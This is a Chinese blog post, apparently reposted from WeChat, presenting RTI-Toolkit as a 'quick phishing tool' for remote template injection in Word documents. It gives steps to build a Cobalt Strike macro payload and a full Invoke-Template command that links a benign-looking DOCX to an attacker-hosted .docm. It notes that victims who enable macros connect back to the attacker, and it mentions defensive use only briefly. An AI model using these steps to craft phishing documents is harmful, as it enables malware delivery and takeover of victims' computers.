RTI-Toolkit-快速钓鱼工具

admin

102367
文章

87
评论

2023年12月31日21:21:07评论34 views字数 701阅读2分20秒阅读模式

RTI-Toolkit-快速钓鱼工具

“

劝君今夜须沈醉，尊前莫话明朝事。

”

RTI-Toolkit 是一个用于远程模板注入攻击的开源 PowerShell 工具包。该工具包包含一个名为 PS-Templator.ps1 的 PowerShell 脚本，可以从攻击和防御的角度使用。

RTI-Toolkit-快速钓鱼工具

PS-Templator.ps1 仅支持 DOCX 文件。Microsoft Office 上下文中的远程模板注入 (RTI) 是指可通过 Office 文档（例如 Word、Excel、PowerPoint）中的恶意模板利用的特定类型的安全漏洞。例如，在 DOCX 文件中，内容以 XML 格式存储在存档中，其中一些 XML 文件可能引用外部资源或模板。攻击者确实可以操纵这些 XML 文件来插入可能利用漏洞或欺骗用户的恶意链接或内容。这是基于宏的攻击。

加载模块

Import-Module .PS-Templator.ps1

可以自己先生成一个带宏的cs马，新建立一个模板-视图-宏-Project-cs生成的宏代码-保存点否-另存为docm

RTI-Toolkit-快速钓鱼工具

使用一个默认的 Word 模板，开整命令

Invoke-Template -InputDoc Name.docx -Link "https://192.168.1.3:8080/Doc1.docm" -Output C:UsersUserDesktopLegitDocument.docx

RTI-Toolkit-快速钓鱼工具

查看是word/_rels下的settings.xml.rels文件

RTI-Toolkit-快速钓鱼工具

结果就是有开启宏的就上线

RTI-Toolkit-快速钓鱼工具

宏的信任操作

RTI-Toolkit-快速钓鱼工具

https://github.com/nickvourd/RTI-Toolkit?tab=readme-ov-file

原文始发于微信公众号（Enginge）：RTI-Toolkit-快速钓鱼工具

左青龙
微信扫一扫

右白虎
微信扫一扫

RTI-Toolkit-快速钓鱼工具

针对目标已知信息的字典生成工具

Swagger API Exploit 1.1

歪脖子技能树 - DY直播工具V1.0

dirsearch_bypass403:目录扫描+JS文件中提取URL和子域+403状态绕过+指纹识别工具

内网穿透工具 nc

开源、离线、免费商用的大模型知识库:Langchain-Chatchat

CS插件乱码

403绕过目录扫描工具

【GitHub精选】红蓝功防资料汇总

工具 | navgix

发表评论

在线咨询

微信